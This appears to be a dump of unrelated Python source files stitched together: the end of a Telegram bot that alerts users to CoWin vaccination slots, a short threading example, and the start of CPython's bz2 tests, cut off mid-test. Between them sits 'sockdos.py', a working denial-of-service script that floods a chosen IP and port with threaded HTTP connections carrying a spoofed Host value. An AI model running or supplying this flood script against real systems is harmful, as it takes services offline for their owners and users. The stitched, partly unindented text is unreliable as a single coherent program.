    centers = CoWinAPIObj.calender_by_pin(pincode, CoWinAPI.today())
    if not centers:
        # Propagate the empty/None result from the API untouched.
        return centers
    return [center for center in centers if center.has_available_sessions()]
def get_formatted_message(
    centers: List[VaccinationCenter], age_limit: AgeRangePref
) -> str:
    """
    Given a list of vaccination centers, this method returns a nicely formatted message which can be sent to the user
    param: age_limit is only used for display purposes. If the user's selected preference is both
    then we should show the age limit of the vaccination center
    """
    header = ""
    # Some pincodes have more than 10 centers, in that case we just limit it to 10 and send those only.
    if len(centers) > 10:
        header = f"Showing 10 centers out of {len(centers)}. Check [CoWin Site](https://www.cowin.gov.in/home) for full list\n"  # noqa
    display_age = True if age_limit == AgeRangePref.MinAgeAny else False
    # TODO: Fix this shit
    # Jinja template: one markdown block per center with a bullet per
    # available session; age suffix only when the user asked for "Both".
    template = """
{%- for c in centers[:10] %}
*{{ c.name }}* {%- if c.fee_type == 'Paid' %}*(Paid)*{%- endif %}:{% for s in c.get_available_sessions() %}
 • {{s.date}}: {{s.capacity}}{%- if display_age %} *({{s.min_age_limit}}+)*{%- endif %}{% endfor %}
{% endfor %}"""
    tm = Template(template)
    return header + tm.render(centers=centers, display_age=display_age)
def filter_centers_by_age_limit(
    age_limit: AgeRangePref, centers: List[VaccinationCenter]
) -> List[VaccinationCenter]:
    """
    filter_centers_by_age_limit filters the centers based on the age preferences set by the user
    If there's no filtering required, then it just returns the centers list as it is. If it needs to filter out centers,
    then it makes a deep copy of `centers`, modifies it and returns that
    """
    if not centers:
        return centers
    # if user hasn't set any age preferences, then just show everything
    if age_limit in [None, AgeRangePref.MinAgeAny, AgeRangePref.Unknown]:
        return centers
    filter_age: int
    if age_limit == AgeRangePref.MinAge18:
        filter_age = 18
    else:
        filter_age = 45
    # TODO: FIX THIS! This makes a deep copy of Vaccination Center objects
    # (copied so the caller's list and session objects are left untouched).
    centers_copy: List[VaccinationCenter] = deepcopy(centers)
    for vc in centers_copy:
        vc.sessions = vc.get_available_sessions_by_age_limit(filter_age)
    # Drop centers whose sessions all got filtered away.
    results: List[VaccinationCenter] = [
        vc for vc in centers_copy if vc.has_available_sessions()
    ]
    return results
def get_message_header(user: User) -> str:
    """First line of slot messages, echoing the user's pincode and age pref."""
    return f"Following slots are available (pincode: {user.pincode}, age preference: {user.age_limit})\n"
def check_slots_command(update: Update, ctx: CallbackContext) -> None:
    """Handle an on-demand slot check: fetch, filter by age, and reply."""
    user = check_if_preferences_are_set(update, ctx)
    if not user:
        return
    vaccination_centers: List[VaccinationCenter]
    try:
        vaccination_centers = get_available_centers_by_pin(user.pincode)
    except CoWinTooManyRequests:
        # CoWin rate-limited us; ask the user to retry rather than crashing.
        update.effective_chat.send_message(
            f"Hey sorry, I wasn't able to reach [CoWin Site](https://www.cowin.gov.in/home) at this moment. "
            "Please try after few minutes.",
            parse_mode="markdown",
        )
        return
    vaccination_centers = filter_centers_by_age_limit(
        user.age_limit, vaccination_centers
    )
    if not vaccination_centers:
        update.effective_chat.send_message(
            f"Hey sorry, seems there are no free slots available (pincode: {user.pincode}, age preference: {user.age_limit})"
        )
        return
    msg: str = get_formatted_message(
        centers=vaccination_centers, age_limit=user.age_limit
    )
    msg = get_message_header(user=user) + msg
    # sanitise_msg keeps us under Telegram's message size limit.
    update.effective_chat.send_message(sanitise_msg(msg), parse_mode="markdown")
    return
def default(update: Update, _: CallbackContext) -> None:
    """Fallback handler for any message no other handler matched."""
    update.message.reply_text(
        "Sorry, I did not understand. Click on /help to know valid commands"
    )
def get_or_create_user(telegram_id: str, chat_id) -> "tuple[User, bool]":
    """Fetch the User row for this Telegram id, creating it if missing.

    Returns a (user, created) pair, mirroring peewee's get_or_create.
    (Annotation fixed: the original `(User, bool)` is not a valid type hint.)
    """
    return User.get_or_create(telegram_id=telegram_id, defaults={"chat_id": chat_id})
def set_age_preference(update: Update, ctx: CallbackContext) -> None:
    """Persist the age preference chosen via an `age: <n>` button callback."""
    query = update.callback_query
    query.answer()
    # AGE_BUTTON_REGEX captures the numeric AgeRangePref value.
    age_pref = ctx.match.groupdict().get("age_mg")
    if age_pref is None:
        return
    user: User
    user, _ = get_or_create_user(
        telegram_id=update.effective_user.id, chat_id=update.effective_chat.id
    )
    user.age_limit = AgeRangePref(int(age_pref))
    user.updated_at = datetime.now()
    # Any interaction revives a soft-deleted account.
    user.deleted_at = None
    user.save()
    if user.pincode:
        update.effective_chat.send_message(
            f"I have set your age preference to {user.age_limit}",
            reply_markup=InlineKeyboardMarkup([[*get_main_buttons()]]),
        )
    else:
        # Onboarding continues: still need a pincode before alerts can work.
        update.effective_chat.send_message(
            f"I have set your age preference to {user.age_limit}. Please enter your pincode to proceed"
        )
def set_pincode(update: Update, ctx: CallbackContext) -> None:
    """Message handler that stores the pincode a user sent.

    Rejects obviously bogus pincodes (wrong length, non-numeric, well-known
    placeholder values) and, if the age preference is still unset, prompts
    for it; otherwise shows the main menu.
    """
    pincode = ctx.match.groupdict().get("pincode_mg")
    if not pincode:
        return
    pincode = pincode.strip()
    # validating pincode is the third difficult problem of computer science:
    # require exactly six digits and reject common placeholder values
    if (
        pincode in ["000000", "111111", "123456"]
        or len(pincode) != 6
        or not pincode.isdigit()
    ):
        # note the trailing space: the original concatenation produced
        # "...valid pincode.Please enter..."
        update.effective_chat.send_message(
            "Uh oh! That doesn't look like a valid pincode. "
            "Please enter a valid pincode to proceed"
        )
        return
    user: User
    user, _ = get_or_create_user(
        telegram_id=update.effective_user.id, chat_id=update.effective_chat.id
    )
    user.pincode = pincode
    user.updated_at = datetime.now()
    user.deleted_at = None  # clearing this re-activates a soft-deleted account
    user.save()
    msg: str = (
        f"I have updated your pincode to {pincode}. If you'd like to change it, send a valid pincode "
        "any time to me."
    )
    reply_markup: InlineKeyboardMarkup
    if user.age_limit is None or user.age_limit == AgeRangePref.Unknown:
        # age preference still unknown: ask for it before showing the main menu
        reply_markup = get_age_kb()
        msg = msg + "\n\nSelect age preference:"
    else:
        reply_markup = InlineKeyboardMarkup([[*get_main_buttons()]])
    update.effective_chat.send_message(msg, reply_markup=reply_markup)
def send_alert_to_user(
    bot: telegram.Bot, user: User, centers: List[VaccinationCenter]
) -> None:
    """Send a slot-availability alert for *centers* to *user* via *bot*.

    No-op when *centers* is empty. If Telegram reports Unauthorized, the
    user is assumed to have blocked the bot and their alerts are disabled;
    on successful delivery the alert bookkeeping fields are updated.
    """
    if not centers:
        return
    msg: str = get_formatted_message(centers=centers, age_limit=user.age_limit)
    msg = (
        "*[ALERT!]* "
        + get_message_header(user=user)
        + msg
        + "\n Click on /pause to disable the notifications"
    )
    try:
        bot.send_message(
            chat_id=user.chat_id, text=sanitise_msg(msg), parse_mode="markdown"
        )
    except telegram.error.Unauthorized:
        # looks like this user blocked us. simply disable them
        user.enabled = False
        user.save()
    else:
        # delivery succeeded: record when and how many alerts this user got
        user.last_alert_sent_at = datetime.now()
        user.total_alerts_sent += 1
        user.save()
def periodic_background_worker():
    """Background loop for the 45+ age group.

    Runs one slot scan per MIN_45_WORKER_INTERVAL, backing off on CoWin
    rate limits and on unexpected errors. Never returns.
    """
    while True:
        try:
            logger.info("starting a bg worker - periodic_background_worker")
            background_worker(age_limit=AgeRangePref.MinAge45)
            logger.info("bg worker executed successfully - periodic_background_worker")
            time.sleep(MIN_45_WORKER_INTERVAL)  # sleep for 10 mins
        except CoWinTooManyRequests:
            # use the module logger (not the root `logging` logger) for consistency
            logger.error("got 403 - too many requests - periodic_background_worker")
            time.sleep(LIMIT_EXCEEDED_DELAY_INTERVAL)
        except Exception as e:
            logger.exception("periodic_background_worker", exc_info=e)
            time.sleep(EXCEPTION_SLEEP_INTERVAL)
def frequent_background_worker():
    """Background loop for the 18+ age group.

    Runs one slot scan per MIN_18_WORKER_INTERVAL, backing off on CoWin
    rate limits and on unexpected errors. Never returns.
    """
    while True:
        try:
            logger.info("starting a bg worker - frequent_background_worker")
            background_worker(age_limit=AgeRangePref.MinAge18)
            logger.info("bg worker executed successfully - frequent_background_worker")
            time.sleep(MIN_18_WORKER_INTERVAL)  # sleep for 30 seconds
        except CoWinTooManyRequests:
            # use the module logger (not the root `logging` logger) for consistency
            logger.error("got 403 - too many requests - frequent_background_worker")
            time.sleep(LIMIT_EXCEEDED_DELAY_INTERVAL)
        except Exception as e:
            logger.exception("frequent_background_worker", exc_info=e)
            time.sleep(EXCEPTION_SLEEP_INTERVAL)
def background_worker(age_limit: AgeRangePref):
    """Scan every subscribed pincode once and alert matching users.

    For each distinct pincode that has at least one enabled user whose age
    preference matches *age_limit* (or is "any"), fetch open slots from
    CoWin and notify each eligible user, throttling 45+ notifications to at
    most one per MIN_45_NOTIFICATION_DELAY seconds.
    """
    bot = Bot(token=TELEGRAM_BOT_TOKEN)
    time_now = datetime.now()
    # find all distinct pincodes where pincode is not null and at least one user exists with alerts enabled
    query = (
        User.select(User.pincode)
        .where(
            (User.pincode.is_null(False))
            & (User.enabled == True)
            & (
                (User.age_limit == AgeRangePref.MinAgeAny)
                | (User.age_limit == age_limit)
            )
        )
        .distinct()
    )
    # TODO: Quick hack to load all pincodes in memory
    query = list(query)
    for distinct_user in query:
        # get all the available vaccination centers with open slots
        vaccination_centers = get_available_centers_by_pin(distinct_user.pincode)
        # sleep, since we have hit CoWin APIs
        time.sleep(COWIN_API_DELAY_INTERVAL)
        if not vaccination_centers:
            continue
        # find all users for this pincode and alerts enabled
        user_query = User.select().where(
            (User.pincode == distinct_user.pincode)
            & (User.enabled == True)
            & (
                (User.age_limit == AgeRangePref.MinAgeAny)
                | (User.age_limit == age_limit)
            )
        )
        for user in user_query:
            delta = time_now - user.last_alert_sent_at
            # use total_seconds(): timedelta.seconds wraps around every day,
            # so a user last alerted 25h ago would look "1h ago" and be throttled
            elapsed = delta.total_seconds()
            # if user age limit is 45, then we shouldn't ping them too often
            if user.age_limit == AgeRangePref.MinAge45:
                if elapsed < MIN_45_NOTIFICATION_DELAY:
                    continue
                filtered_centers = filter_centers_by_age_limit(
                    user.age_limit, vaccination_centers
                )
                if not filtered_centers:
                    continue
                send_alert_to_user(bot, user, filtered_centers)
            # for users with age limit of 18, we send the alert right away
            # (the original filtered twice here; filtering once is equivalent)
            if user.age_limit == AgeRangePref.MinAge18:
                filtered_centers = filter_centers_by_age_limit(
                    user.age_limit, vaccination_centers
                )
                if not filtered_centers:
                    continue
                send_alert_to_user(bot, user, filtered_centers)
            # here comes the tricky part. for users who have set up both
            # we would want to send 18+ alerts more often than 45+
            if user.age_limit == AgeRangePref.MinAgeAny:
                filtered_centers: List[VaccinationCenter]
                if elapsed < MIN_45_NOTIFICATION_DELAY:
                    # include only 18+ results
                    filtered_centers = filter_centers_by_age_limit(
                        AgeRangePref.MinAge18, vaccination_centers
                    )
                else:
                    # include both results
                    filtered_centers = filter_centers_by_age_limit(
                        user.age_limit, vaccination_centers
                    )
                if not filtered_centers:
                    continue
                send_alert_to_user(bot, user, filtered_centers)
# works in the background to remove all the deleted user rows permanently
def clean_up() -> None:
    """Permanently remove all soft-deleted users (deleted_at is set).

    The original built the peewee delete query but never ran it:
    ``Model.delete().where(...)`` only constructs the query object, so no
    rows were ever removed. ``.execute()`` actually performs the DELETE.
    """
    User.delete().where(User.deleted_at.is_null(False)).execute()
# source: https://github.com/python-telegram-bot/python-telegram-bot/blob/master/examples/errorhandlerbot.py
def error_handler(update: object, context: CallbackContext) -> None:
    """Global dispatcher error handler: log the exception and forward an
    HTML-formatted traceback plus context to the developer chat.

    Based on python-telegram-bot's errorhandlerbot.py example.
    """
    logger.error(msg="Exception while handling an update:", exc_info=context.error)
    # render the full traceback of the failed update for the notification
    tb_list = traceback.format_exception(
        None, context.error, context.error.__traceback__
    )
    tb_string = "".join(tb_list)
    # `update` may be any object; only real Update instances serialise to dicts
    update_str = update.to_dict() if isinstance(update, Update) else str(update)
    message = (
        f"An exception was raised while handling an update\n"
        f"<pre>update = {html.escape(json.dumps(update_str, indent=2, ensure_ascii=False))}"
        "</pre>\n\n"
        f"<pre>context.chat_data = {html.escape(str(context.chat_data))}</pre>\n\n"
        f"<pre>context.user_data = {html.escape(str(context.user_data))}</pre>\n\n"
        f"<pre>{html.escape(tb_string)}</pre>"
    )
    try:
        context.bot.send_message(
            chat_id=DEVELOPER_CHAT_ID, text=message, parse_mode=ParseMode.HTML
        )
    except Exception as e:
        # never let the error handler itself crash the dispatcher
        logger.exception("error_handler", exc_info=e)
def main() -> None:
    """Entry point: register bot commands and handlers, initialise the
    database, start the two background alert workers and begin polling."""
    # initialise bot and set commands
    bot = Bot(token=TELEGRAM_BOT_TOKEN)
    bot.set_my_commands(
        [
            BotCommand(command="start", description="start the bot session"),
            BotCommand(command="alert", description="enable alerts on new slots"),
            BotCommand(
                command="help", description="provide help on how to use the bot"
            ),
            BotCommand(command="resume", description="enable alerts on new slots"),
            BotCommand(command="pause", description="disable alerts on new slots"),
            BotCommand(command="pincode", description="change pincode"),
            BotCommand(command="age", description="change age preference"),
        ]
    )
    # connect and create tables
    db.connect()
    db.create_tables(
        [
            User,
        ]
    )
    # create the required index
    # TODO:
    # User.add_index(User.enabled, User.pincode,
    #                where=((User.enabled == True) & (User.pincode.is_null(False))))
    # initialise the handler
    updater = Updater(TELEGRAM_BOT_TOKEN)
    # Add handlers: slash commands first, then callback-query button
    # handlers, then free-text message handlers (regex-matched), and
    # finally the catch-all `default` for anything that is not a command.
    updater.dispatcher.add_handler(CommandHandler("start", start))
    updater.dispatcher.add_handler(CommandHandler("help", help_command))
    updater.dispatcher.add_handler(CommandHandler("alert", setup_alert_command))
    updater.dispatcher.add_handler(CommandHandler("resume", setup_alert_command))
    updater.dispatcher.add_handler(CommandHandler("pause", disable_alert_command))
    updater.dispatcher.add_handler(CommandHandler("age", age_command))
    updater.dispatcher.add_handler(CommandHandler("pincode", pincode_command))
    updater.dispatcher.add_handler(CommandHandler("delete", delete_cmd_handler))
    updater.dispatcher.add_handler(
        CallbackQueryHandler(set_age_preference, pattern=AGE_BUTTON_REGEX)
    )
    updater.dispatcher.add_handler(
        CallbackQueryHandler(cmd_button_handler, pattern=CMD_BUTTON_REGEX)
    )
    updater.dispatcher.add_handler(
        MessageHandler(
            Filters.regex(re.compile(PINCODE_PREFIX_REGEX, re.IGNORECASE)), set_pincode
        )
    )
    updater.dispatcher.add_handler(
        MessageHandler(
            Filters.regex(re.compile(DISABLE_TEXT_REGEX, re.IGNORECASE)),
            disable_alert_command,
        )
    )
    updater.dispatcher.add_handler(MessageHandler(~Filters.command, default))
    updater.dispatcher.add_error_handler(error_handler)
    # launch two background threads, one for slow worker (age group 45+) and another for fast one (age group 18+)
    threading.Thread(target=frequent_background_worker).start()
    threading.Thread(target=periodic_background_worker).start()
    # Start the Bot
    updater.start_polling()
    # block it, baby
    updater.idle()
if __name__ == "__main__":
    main()
|
sockdos.py | import socket, threading, sys, os
try:
target = sys.argv[1]
port = int(sys.argv[2])
speed = int(sys.argv[3])
fake_ip = '104.74.112.38'
except:
print("""
Usage:
python3 {} <target_ip> <port> <speed>
""".format(os.path.basename(__file__)))
exit()
def dos():
sent = 0
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendto(("GET /"+target+"HTTP/1.1\r\n").encode('ascii'), (target, port))
s.sendto(("HOST: "+fake_ip+"\r\n\r\n").encode('ascii'), (target, port))
s.close()
sent += 1
print(f'sent {sent}')
for i in range(0, speed):
threading.Thread(target=dos).start()
|
creating_threads.py | import time
from threading import Thread
def do_work():
    """Simulate one unit of work: announce start, block one second, announce end."""
    print("Starting work")
    time.sleep(1)
    print("Finished work")
# Launch five concurrent workers; each thread executes do_work once.
for _ in range(5):
    Thread(target=do_work).start()
|
test_bz2.py | from test import support
from test.support import bigmemtest, _4G
import unittest
from io import BytesIO, DEFAULT_BUFFER_SIZE
import os
import pickle
import glob
import tempfile
import pathlib
import random
import shutil
import subprocess
import threading
from test.support import unlink
import _compression
import sys
# Skip tests if the bz2 module doesn't exist.
bz2 = support.import_module('bz2')
from bz2 import BZ2File, BZ2Compressor, BZ2Decompressor
# Cached availability of the external `bunzip2` binary (None = not yet probed).
has_cmdline_bunzip2 = None
def ext_decompress(data):
    """Decompress *data*, preferring the external bunzip2 tool when present.

    Falls back to the bz2 module otherwise. The shutil.which probe runs at
    most once; its result is cached in the module-level flag.
    """
    global has_cmdline_bunzip2
    if has_cmdline_bunzip2 is None:
        has_cmdline_bunzip2 = shutil.which('bunzip2') is not None
    if not has_cmdline_bunzip2:
        return bz2.decompress(data)
    return subprocess.check_output(['bunzip2'], input=data)
class BaseTest(unittest.TestCase):
    """Base for other testcases: shared fixtures and a per-test temp file."""
    # /etc/passwd-style sample lines used as the canonical uncompressed payload.
    TEXT_LINES = [
        b'root:x:0:0:root:/root:/bin/bash\n',
        b'bin:x:1:1:bin:/bin:\n',
        b'daemon:x:2:2:daemon:/sbin:\n',
        b'adm:x:3:4:adm:/var/adm:\n',
        b'lp:x:4:7:lp:/var/spool/lpd:\n',
        b'sync:x:5:0:sync:/sbin:/bin/sync\n',
        b'shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\n',
        b'halt:x:7:0:halt:/sbin:/sbin/halt\n',
        b'mail:x:8:12:mail:/var/spool/mail:\n',
        b'news:x:9:13:news:/var/spool/news:\n',
        b'uucp:x:10:14:uucp:/var/spool/uucp:\n',
        b'operator:x:11:0:operator:/root:\n',
        b'games:x:12:100:games:/usr/games:\n',
        b'gopher:x:13:30:gopher:/usr/lib/gopher-data:\n',
        b'ftp:x:14:50:FTP User:/var/ftp:/bin/bash\n',
        b'nobody:x:65534:65534:Nobody:/home:\n',
        b'postfix:x:100:101:postfix:/var/spool/postfix:\n',
        b'niemeyer:x:500:500::/home/niemeyer:/bin/bash\n',
        b'postgres:x:101:102:PostgreSQL Server:/var/lib/pgsql:/bin/bash\n',
        b'mysql:x:102:103:MySQL server:/var/lib/mysql:/bin/bash\n',
        b'www:x:103:104::/var/www:/bin/false\n',
    ]
    TEXT = b''.join(TEXT_LINES)
    # DATA is a single pre-compressed bz2 stream whose payload is TEXT
    # (the decompressor tests assert decompress(DATA) == TEXT).
    DATA = b'BZh91AY&SY.\xc8N\x18\x00\x01>_\x80\x00\x10@\x02\xff\xf0\x01\x07n\x00?\xe7\xff\xe00\x01\x99\xaa\x00\xc0\x03F\x86\x8c#&\x83F\x9a\x03\x06\xa6\xd0\xa6\x93M\x0fQ\xa7\xa8\x06\x804hh\x12$\x11\xa4i4\xf14S\xd2<Q\xb5\x0fH\xd3\xd4\xdd\xd5\x87\xbb\xf8\x94\r\x8f\xafI\x12\xe1\xc9\xf8/E\x00pu\x89\x12]\xc9\xbbDL\nQ\x0e\t1\x12\xdf\xa0\xc0\x97\xac2O9\x89\x13\x94\x0e\x1c7\x0ed\x95I\x0c\xaaJ\xa4\x18L\x10\x05#\x9c\xaf\xba\xbc/\x97\x8a#C\xc8\xe1\x8cW\xf9\xe2\xd0\xd6M\xa7\x8bXa<e\x84t\xcbL\xb3\xa7\xd9\xcd\xd1\xcb\x84.\xaf\xb3\xab\xab\xad`n}\xa0lh\tE,\x8eZ\x15\x17VH>\x88\xe5\xcd9gd6\x0b\n\xe9\x9b\xd5\x8a\x99\xf7\x08.K\x8ev\xfb\xf7xw\xbb\xdf\xa1\x92\xf1\xdd|/";\xa2\xba\x9f\xd5\xb1#A\xb6\xf6\xb3o\xc9\xc5y\\\xebO\xe7\x85\x9a\xbc\xb6f8\x952\xd5\xd7"%\x89>V,\xf7\xa6z\xe2\x9f\xa3\xdf\x11\x11"\xd6E)I\xa9\x13^\xca\xf3r\xd0\x03U\x922\xf26\xec\xb6\xed\x8b\xc3U\x13\x9d\xc5\x170\xa4\xfa^\x92\xacDF\x8a\x97\xd6\x19\xfe\xdd\xb8\xbd\x1a\x9a\x19\xa3\x80ankR\x8b\xe5\xd83]\xa9\xc6\x08\x82f\xf6\xb9"6l$\xb8j@\xc0\x8a\xb0l1..\xbak\x83ls\x15\xbc\xf4\xc1\x13\xbe\xf8E\xb8\x9d\r\xa8\x9dk\x84\xd3n\xfa\xacQ\x07\xb1%y\xaav\xb4\x08\xe0z\x1b\x16\xf5\x04\xe9\xcc\xb9\x08z\x1en7.G\xfc]\xc9\x14\xe1B@\xbb!8`'
    # A valid bz2 stream containing zero bytes of payload.
    EMPTY_DATA = b'BZh9\x17rE8P\x90\x00\x00\x00\x00'
    # Deliberately invalid input for error-path tests.
    BAD_DATA = b'this is not a valid bzip2 file'
    # Some tests need more than one block of uncompressed data. Since one block
    # is at least 100,000 bytes, we gather some data dynamically and compress it.
    # Note that this assumes that compression works correctly, so we cannot
    # simply use the bigger test data for all tests.
    test_size = 0
    BIG_TEXT = bytearray(128*1024)
    for fname in glob.glob(os.path.join(os.path.dirname(__file__), '*.py')):
        with open(fname, 'rb') as fh:
            test_size += fh.readinto(memoryview(BIG_TEXT)[test_size:])
        if test_size > 128*1024:
            break
    BIG_DATA = bz2.compress(BIG_TEXT, compresslevel=1)
    def setUp(self):
        """Allocate a fresh temporary file path for this test."""
        fd, self.filename = tempfile.mkstemp()
        os.close(fd)
    def tearDown(self):
        """Remove the per-test temporary file."""
        unlink(self.filename)
class BZ2FileTest(BaseTest):
    "Test the BZ2File class."
    def createTempFile(self, streams=1, suffix=b""):
        """Write `streams` back-to-back copies of DATA, then `suffix`, to self.filename."""
        with open(self.filename, "wb") as f:
            f.write(self.DATA * streams)
            f.write(suffix)
    def testBadArgs(self):
        """Constructor rejects bad filename types, modes and compresslevels."""
        self.assertRaises(TypeError, BZ2File, 123.456)
        self.assertRaises(ValueError, BZ2File, os.devnull, "z")
        self.assertRaises(ValueError, BZ2File, os.devnull, "rx")
        self.assertRaises(ValueError, BZ2File, os.devnull, "rbt")
        self.assertRaises(ValueError, BZ2File, os.devnull, compresslevel=0)
        self.assertRaises(ValueError, BZ2File, os.devnull, compresslevel=10)
    # --- read() behaviour, single- and multi-stream ---
    def testRead(self):
        self.createTempFile()
        with BZ2File(self.filename) as bz2f:
            self.assertRaises(TypeError, bz2f.read, float())
            self.assertEqual(bz2f.read(), self.TEXT)
    def testReadBadFile(self):
        self.createTempFile(streams=0, suffix=self.BAD_DATA)
        with BZ2File(self.filename) as bz2f:
            self.assertRaises(OSError, bz2f.read)
    def testReadMultiStream(self):
        self.createTempFile(streams=5)
        with BZ2File(self.filename) as bz2f:
            self.assertRaises(TypeError, bz2f.read, float())
            self.assertEqual(bz2f.read(), self.TEXT * 5)
    def testReadMonkeyMultiStream(self):
        # Test BZ2File.read() on a multi-stream archive where a stream
        # boundary coincides with the end of the raw read buffer.
        buffer_size = _compression.BUFFER_SIZE
        _compression.BUFFER_SIZE = len(self.DATA)
        try:
            self.createTempFile(streams=5)
            with BZ2File(self.filename) as bz2f:
                self.assertRaises(TypeError, bz2f.read, float())
                self.assertEqual(bz2f.read(), self.TEXT * 5)
        finally:
            # always restore the module-level buffer size
            _compression.BUFFER_SIZE = buffer_size
    def testReadTrailingJunk(self):
        self.createTempFile(suffix=self.BAD_DATA)
        with BZ2File(self.filename) as bz2f:
            self.assertEqual(bz2f.read(), self.TEXT)
    def testReadMultiStreamTrailingJunk(self):
        self.createTempFile(streams=5, suffix=self.BAD_DATA)
        with BZ2File(self.filename) as bz2f:
            self.assertEqual(bz2f.read(), self.TEXT * 5)
    def testRead0(self):
        self.createTempFile()
        with BZ2File(self.filename) as bz2f:
            self.assertRaises(TypeError, bz2f.read, float())
            self.assertEqual(bz2f.read(0), b"")
    def testReadChunk10(self):
        self.createTempFile()
        with BZ2File(self.filename) as bz2f:
            text = b''
            while True:
                str = bz2f.read(10)
                if not str:
                    break
                text += str
            self.assertEqual(text, self.TEXT)
    def testReadChunk10MultiStream(self):
        self.createTempFile(streams=5)
        with BZ2File(self.filename) as bz2f:
            text = b''
            while True:
                str = bz2f.read(10)
                if not str:
                    break
                text += str
            self.assertEqual(text, self.TEXT * 5)
    def testRead100(self):
        self.createTempFile()
        with BZ2File(self.filename) as bz2f:
            self.assertEqual(bz2f.read(100), self.TEXT[:100])
    def testPeek(self):
        """peek() returns some data without advancing the read position."""
        self.createTempFile()
        with BZ2File(self.filename) as bz2f:
            pdata = bz2f.peek()
            self.assertNotEqual(len(pdata), 0)
            self.assertTrue(self.TEXT.startswith(pdata))
            self.assertEqual(bz2f.read(), self.TEXT)
    def testReadInto(self):
        self.createTempFile()
        with BZ2File(self.filename) as bz2f:
            n = 128
            b = bytearray(n)
            self.assertEqual(bz2f.readinto(b), n)
            self.assertEqual(b, self.TEXT[:n])
            # second readinto gets only the remainder, not a full buffer
            n = len(self.TEXT) - n
            b = bytearray(len(self.TEXT))
            self.assertEqual(bz2f.readinto(b), n)
            self.assertEqual(b[:n], self.TEXT[-n:])
    # --- line-oriented reads and iteration ---
    def testReadLine(self):
        self.createTempFile()
        with BZ2File(self.filename) as bz2f:
            self.assertRaises(TypeError, bz2f.readline, None)
            for line in self.TEXT_LINES:
                self.assertEqual(bz2f.readline(), line)
    def testReadLineMultiStream(self):
        self.createTempFile(streams=5)
        with BZ2File(self.filename) as bz2f:
            self.assertRaises(TypeError, bz2f.readline, None)
            for line in self.TEXT_LINES * 5:
                self.assertEqual(bz2f.readline(), line)
    def testReadLines(self):
        self.createTempFile()
        with BZ2File(self.filename) as bz2f:
            self.assertRaises(TypeError, bz2f.readlines, None)
            self.assertEqual(bz2f.readlines(), self.TEXT_LINES)
    def testReadLinesMultiStream(self):
        self.createTempFile(streams=5)
        with BZ2File(self.filename) as bz2f:
            self.assertRaises(TypeError, bz2f.readlines, None)
            self.assertEqual(bz2f.readlines(), self.TEXT_LINES * 5)
    def testIterator(self):
        self.createTempFile()
        with BZ2File(self.filename) as bz2f:
            self.assertEqual(list(iter(bz2f)), self.TEXT_LINES)
    def testIteratorMultiStream(self):
        self.createTempFile(streams=5)
        with BZ2File(self.filename) as bz2f:
            self.assertEqual(list(iter(bz2f)), self.TEXT_LINES * 5)
    def testClosedIteratorDeadlock(self):
        # Issue #3309: Iteration on a closed BZ2File should release the lock.
        self.createTempFile()
        bz2f = BZ2File(self.filename)
        bz2f.close()
        self.assertRaises(ValueError, next, bz2f)
        # This call will deadlock if the above call failed to release the lock.
        self.assertRaises(ValueError, bz2f.readlines)
    # --- write-mode behaviour ---
    def testWrite(self):
        with BZ2File(self.filename, "w") as bz2f:
            self.assertRaises(TypeError, bz2f.write)
            bz2f.write(self.TEXT)
        with open(self.filename, 'rb') as f:
            self.assertEqual(ext_decompress(f.read()), self.TEXT)
    def testWriteChunks10(self):
        with BZ2File(self.filename, "w") as bz2f:
            n = 0
            while True:
                str = self.TEXT[n*10:(n+1)*10]
                if not str:
                    break
                bz2f.write(str)
                n += 1
        with open(self.filename, 'rb') as f:
            self.assertEqual(ext_decompress(f.read()), self.TEXT)
    def testWriteNonDefaultCompressLevel(self):
        expected = bz2.compress(self.TEXT, compresslevel=5)
        with BZ2File(self.filename, "w", compresslevel=5) as bz2f:
            bz2f.write(self.TEXT)
        with open(self.filename, "rb") as f:
            self.assertEqual(f.read(), expected)
    def testWriteLines(self):
        with BZ2File(self.filename, "w") as bz2f:
            self.assertRaises(TypeError, bz2f.writelines)
            bz2f.writelines(self.TEXT_LINES)
        # Issue #1535500: Calling writelines() on a closed BZ2File
        # should raise an exception.
        self.assertRaises(ValueError, bz2f.writelines, ["a"])
        with open(self.filename, 'rb') as f:
            self.assertEqual(ext_decompress(f.read()), self.TEXT)
    def testWriteMethodsOnReadOnlyFile(self):
        with BZ2File(self.filename, "w") as bz2f:
            bz2f.write(b"abc")
        with BZ2File(self.filename, "r") as bz2f:
            self.assertRaises(OSError, bz2f.write, b"a")
            self.assertRaises(OSError, bz2f.writelines, [b"a"])
    def testAppend(self):
        """Append mode adds a second bz2 stream after the first."""
        with BZ2File(self.filename, "w") as bz2f:
            self.assertRaises(TypeError, bz2f.write)
            bz2f.write(self.TEXT)
        with BZ2File(self.filename, "a") as bz2f:
            self.assertRaises(TypeError, bz2f.write)
            bz2f.write(self.TEXT)
        with open(self.filename, 'rb') as f:
            self.assertEqual(ext_decompress(f.read()), self.TEXT * 2)
    # --- seek()/tell() behaviour ---
    def testSeekForward(self):
        self.createTempFile()
        with BZ2File(self.filename) as bz2f:
            self.assertRaises(TypeError, bz2f.seek)
            bz2f.seek(150)
            self.assertEqual(bz2f.read(), self.TEXT[150:])
    def testSeekForwardAcrossStreams(self):
        self.createTempFile(streams=2)
        with BZ2File(self.filename) as bz2f:
            self.assertRaises(TypeError, bz2f.seek)
            bz2f.seek(len(self.TEXT) + 150)
            self.assertEqual(bz2f.read(), self.TEXT[150:])
    def testSeekBackwards(self):
        self.createTempFile()
        with BZ2File(self.filename) as bz2f:
            bz2f.read(500)
            bz2f.seek(-150, 1)
            self.assertEqual(bz2f.read(), self.TEXT[500-150:])
    def testSeekBackwardsAcrossStreams(self):
        self.createTempFile(streams=2)
        with BZ2File(self.filename) as bz2f:
            readto = len(self.TEXT) + 100
            while readto > 0:
                readto -= len(bz2f.read(readto))
            bz2f.seek(-150, 1)
            self.assertEqual(bz2f.read(), self.TEXT[100-150:] + self.TEXT)
    def testSeekBackwardsFromEnd(self):
        self.createTempFile()
        with BZ2File(self.filename) as bz2f:
            bz2f.seek(-150, 2)
            self.assertEqual(bz2f.read(), self.TEXT[len(self.TEXT)-150:])
    def testSeekBackwardsFromEndAcrossStreams(self):
        self.createTempFile(streams=2)
        with BZ2File(self.filename) as bz2f:
            bz2f.seek(-1000, 2)
            self.assertEqual(bz2f.read(), (self.TEXT * 2)[-1000:])
    def testSeekPostEnd(self):
        # seeking past EOF clamps the position to the decompressed length
        self.createTempFile()
        with BZ2File(self.filename) as bz2f:
